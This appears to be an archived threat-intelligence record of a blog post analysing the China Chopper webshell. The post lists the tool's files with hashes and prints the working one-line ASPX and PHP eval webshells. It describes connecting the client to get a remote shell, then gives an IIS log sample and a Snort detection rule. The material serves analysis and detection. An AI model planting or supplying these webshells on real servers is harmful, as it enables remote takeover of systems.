{
	"id": "6e94712d-4ec3-46de-8ff1-47c937e879ae",
	"created_at": "2026-04-06T00:10:16.346613Z",
	"updated_at": "2026-04-10T03:21:24.722653Z",
	"deleted_at": null,
	"sha1_hash": "6ac96277e3120a9730fd6584cd42217c3527aed1",
	"title": "China Chopper Webshell - the 4KB that Owns your Web Server",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 186980,
	"plain_text": "China Chopper Webshell - the 4KB that Owns your Web Server\r\nArchived: 2026-04-05 14:23:11 UTC\r\nI've been wanting to blog about China Chopper for sometime and finally got around to it. When I first started\r\nresearching this webshell I was unable to find anything about how to set it up and configure it. In this post I'll go\r\nover the components of China Chopper as well as setting it up.\r\nChina Chopper is a webshell used to remotely access Windows or Linux servers. It is malicious software used by\r\nthe bad guys. Given the name China Chopper it is developed in China and used heavily by Chinese hackers.\r\nThe software is hosted on maicaidao.com, which I might mention has recently changed. \r\nThe webshell consists mainly of two parts, the client interface (caidao.exe) and the file placed on the\r\ncompromised web server. \r\nHere are the files included with the download \u0026 MD5's.\r\ncaidao.exe                                     5001ef50c7e869253a7c152a638eab8a\r\nCCC\r\n aspRwWithJMail.ccc                         a6d6cbfa2ead1d0e8a6735aa49b963ff\r\n aspSpy.ccc                                    be207c46105c38571ae958ae2da47297\r\n aspx.ccc                                        cc07ac4caef188334fc330f62e0a574a\r\nhttps://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html\r\nPage 1 of 4\n\nphp.ccc                                         9100b18660f3a1eeca7ea801b357b8ce\r\n phpSpy.ccc                                    ce1a9fc93040d5c94f789b579fe1c106\r\nCustomize\r\n Customize.aspx                                8aa603ee2454da64f4c70f24cc0b5e08\r\n Customize.cfm                                 ad8288227240477a95fb023551773c84\r\n Customize.jsp                                  acba8115d027529763ea5c7ed6621499  \r\nThe file dropped on the compromised server is nice and small. The client, caidao.exe communicates directly with\r\nthe file.\r\nServers running IIS, place the contents below in a file called webshell.aspx\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%eval(Request.Item[”password\"],\"unsafe\");%\u003e\r\nServers running Apache with PHP, place the contents in a file call webshell.php\r\n\u003c?php @eval($_POST['password']);?\u003e\r\nNext, open caidao.exe\r\nYou will see examples already listed referencing maicaidao.com. Lets add in the information to communicate with\r\nour test compromised Windows 2008 R2 server using the webshell.aspx file mentioned above.\r\nRight-click and select add, you will see the following dialog box\r\nhttps://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html\r\nPage 2 of 4\n\nAddress field is the URL to the file on the compromised server. The next field acts as a password of sort, if this\r\ndoesn't match the contents in the webshell.aspx file it won't work.\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%eval(Request.Item[”password\"],\"unsafe\");%\u003e\r\nChange the file type to match ASPX and change the codepage to UTF-8. \r\nClick 'Edit' to save your changes. To open up a remote shell, right-click on the entry and select 'Virtual Terminal'.\r\n If everything was correctly you will see the following command interface.\r\nI should note that this works on a fully patched and default configuration of Windows 2008 R2 web server\r\nrole. Primarily because .NET by default has full control, if you change it to 'High' China Chopper (and many\r\nother) webshell will not work.\r\nWhen the webshell is executing commands you will see the following with Process Explorer\r\nIIS logs will show only a post to the file, here is a line copied from the IIS log\r\n2012-11-16 22:30:14 172.16.192.137 POST /webshell.aspx - 80 - 172.16.192.140 Mozilla/4.0+\r\n(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0 31\r\nhttps://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html\r\nPage 3 of 4\n\nThe traffic is base64 encoded, here is a snipit from Wireshark during a post of the initial connection and sending\r\nthe netstat command.\r\nThere are many ways to protect against this so I won't go into that, however it would be a good idea to do some\r\nSplunking on http posts! If you don't have Splunk you could use snort to  monitor for this with a simple rule to\r\nwatch for base64_decode and POST.\r\nI put this together really quick as a proof of concept so no consideration was put into performance. Snort might\r\nalready have much better rules in place to detect base64 in http traffic.\r\nalert tcp any any -\u003e any 80 ( sid:900001;  content:\"base64_decode\"; http_client_body;flow:to_server,established;\r\ncontent:\"POST\"; nocase;http_method; ;msg:\"Webshell Detected Apache\";)\r\nI hope this post has informative and helped you out. If you have any questions, please feel free to contact me.\r\nKeith\r\nSource: https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html\r\nhttps://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html"
	],
	"report_names": [
		"china-chopper-webshell.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434216,
	"ts_updated_at": 1775791284,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6ac96277e3120a9730fd6584cd42217c3527aed1.pdf",
		"text": "https://archive.orkl.eu/6ac96277e3120a9730fd6584cd42217c3527aed1.txt",
		"img": "https://archive.orkl.eu/6ac96277e3120a9730fd6584cd42217c3527aed1.jpg"
	}
}